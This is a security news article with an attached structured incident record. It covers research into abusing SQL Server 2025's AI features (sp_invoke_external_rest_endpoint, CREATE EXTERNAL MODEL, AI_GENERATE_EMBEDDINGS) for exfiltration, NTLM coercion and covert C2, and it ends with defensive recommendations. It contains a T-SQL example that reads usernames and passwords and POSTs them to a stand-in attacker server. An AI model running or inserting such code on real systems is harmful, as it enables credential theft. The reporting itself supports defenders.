Microsoft SQL Server 2025’s AI Features Expose New Data Exfiltration Risks
A recent security analysis by researcher Justin Kalnasy of SpecterOps reveals that Microsoft SQL Server 2025’s native AI capabilities can be weaponized by attackers to exfiltrate sensitive data and establish covert command-and-control (C2) channels directly within the database engine. The newly introduced AI-focused features designed to support workflows like Retrieval-Augmented Generation (RAG) include stored procedures and functions such as sp_invoke_external_rest_endpoint, CREATE EXTERNAL MODEL, and AI_GENERATE_EMBEDDINGS, all of which enable SQL Server to communicate with external services over HTTPS.
The most critical vulnerability lies in sp_invoke_external_rest_endpoint, which allows database instances to send arbitrary HTTP requests to external endpoints with payloads up to 100MB. While intended for legitimate API integrations, this functionality provides attackers with a built-in data exfiltration channel. Once an adversary gains high-privileged access (e.g., sysadmin), they can extract entire tables or files and transmit them to attacker-controlled infrastructure without relying on traditional tools like PowerShell or xp_cmdshell, which are more likely to trigger security alerts.
Attackers can serialize sensitive data into JSON format and exfiltrate it in bulk via HTTPS, avoiding bandwidth constraints typical of C2 frameworks. For example:
DECLARE @payload NVARCHAR(MAX);
SELECT @payload = (SELECT username, password FROM dbo.app_users FOR JSON AUTO);
EXEC sp_invoke_external_rest_endpoint @url = N'https://attacker-server/collect', @method = 'POST', @payload = @payload;
Additionally, combining the REST endpoint feature with OPENROWSET enables file-level exfiltration, allowing attackers to read and transmit sensitive system files.
Beyond direct data theft, SQL Server 2025 can be repurposed as a persistent exfiltration platform. By leveraging database triggers, attackers can automatically send newly inserted or updated records to remote servers in real time, enabling continuous credential harvesting or data leakage without manual intervention.
The CREATE EXTERNAL MODEL feature introduces further risks by allowing attackers to coerce NTLM authentication over SMB. By specifying a malicious UNC path as the model location, SQL Server can be forced to authenticate against attacker-controlled infrastructure, facilitating credential capture or relay attacks.
More sophisticated techniques involve abusing AI features to establish covert C2 channels. By registering an external model pointing to an attacker-controlled API and using AI_GENERATE_EMBEDDINGS as a communication mechanism, adversaries can issue commands and receive responses disguised as legitimate AI traffic. This blending of malicious activity with normal AI workflows complicates detection, particularly in environments where outbound HTTPS traffic from database servers is now considered routine.
The integration of AI capabilities into SQL Server 2025 marks a shift in enterprise database security, as historically suspicious outbound traffic is now normalized. Traditional detection strategies may prove less effective, requiring defenders to reassess security baselines, monitor high-risk feature usage, and restrict outbound network access from database servers. The findings highlight a broader trend: as AI becomes embedded in core enterprise software, it introduces new avenues for exploitation if not properly secured.
Source: https://gbhackers.com/hackers-could-abuse-sql-server-2025/
Microsoft TPRM report: https://www.rankiteo.com/company/microsoft-security
"id": "mic1781785861",
"linkid": "microsoft-security",
"type": "Vulnerability",
"date": "6/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': 'Organizations using Microsoft '
'SQL Server 2025 with AI '
'features enabled',
'industry': 'Technology/Enterprise Software',
'location': 'Global',
'name': 'Microsoft SQL Server 2025',
'type': 'Database Software'}],
'attack_vector': 'Abuse of legitimate AI features in SQL Server 2025',
'data_breach': {'data_exfiltration': 'Yes (via HTTPS to attacker-controlled '
'infrastructure)',
'personally_identifiable_information': 'Potential (if stored '
'in compromised '
'tables)',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Personally Identifiable '
'Information (PII)',
'Credentials (usernames, '
'passwords)',
'System files']},
'description': 'A recent security analysis by researcher Justin Kalnasy of '
'SpecterOps reveals that Microsoft SQL Server 2025’s native AI '
'capabilities can be weaponized by attackers to exfiltrate '
'sensitive data and establish covert command-and-control (C2) '
'channels directly within the database engine. The newly '
'introduced AI-focused features include stored procedures and '
'functions such as sp_invoke_external_rest_endpoint, CREATE '
'EXTERNAL MODEL, and AI_GENERATE_EMBEDDINGS, which enable SQL '
'Server to communicate with external services over HTTPS. '
'Attackers can exploit these features to exfiltrate data, '
'establish persistence, and evade detection.',
'impact': {'brand_reputation_impact': 'Potential erosion of trust in '
'Microsoft SQL Server 2025 security',
'data_compromised': 'Sensitive data (e.g., usernames, passwords, '
'system files)',
'identity_theft_risk': 'High (if PII is exfiltrated)',
'operational_impact': 'Potential unauthorized data access and '
'exfiltration',
'payment_information_risk': 'High (if payment data is exfiltrated)',
'systems_affected': 'Microsoft SQL Server 2025 instances with AI '
'features enabled'},
'lessons_learned': 'The integration of AI capabilities into core enterprise '
'software introduces new attack surfaces. Traditional '
'detection strategies may be less effective, requiring '
'defenders to reassess security baselines and monitor '
'high-risk feature usage.',
'post_incident_analysis': {'corrective_actions': ['Disable or restrict '
'high-risk features if not '
'required',
'Implement strict outbound '
'traffic policies for '
'database servers',
'Enhance monitoring for '
'anomalous AI feature '
'usage'],
'root_causes': 'Abuse of legitimate AI features in '
'SQL Server 2025 for malicious '
'purposes (e.g., data exfiltration, '
'C2 channels)'},
'recommendations': ['Restrict outbound network access from database servers',
'Monitor usage of high-risk features (e.g., '
'sp_invoke_external_rest_endpoint, CREATE EXTERNAL MODEL)',
'Review and update security baselines for SQL Server 2025',
'Implement network segmentation to limit database server '
'communications',
'Educate security teams on new AI-related attack vectors'],
'references': [{'source': 'SpecterOps Research (Justin Kalnasy)'}],
'response': {'enhanced_monitoring': 'Recommended to monitor high-risk feature '
'usage (e.g., '
'sp_invoke_external_rest_endpoint)',
'network_segmentation': 'Recommended to restrict outbound '
'network access from database servers'},
'title': 'Microsoft SQL Server 2025’s AI Features Expose New Data '
'Exfiltration Risks',
'type': 'Data Exfiltration',
'vulnerability_exploited': ['sp_invoke_external_rest_endpoint (arbitrary HTTP '
'requests)',
'CREATE EXTERNAL MODEL (NTLM coercion)',
'AI_GENERATE_EMBEDDINGS (covert C2 channels)',
'OPENROWSET (file-level exfiltration)']}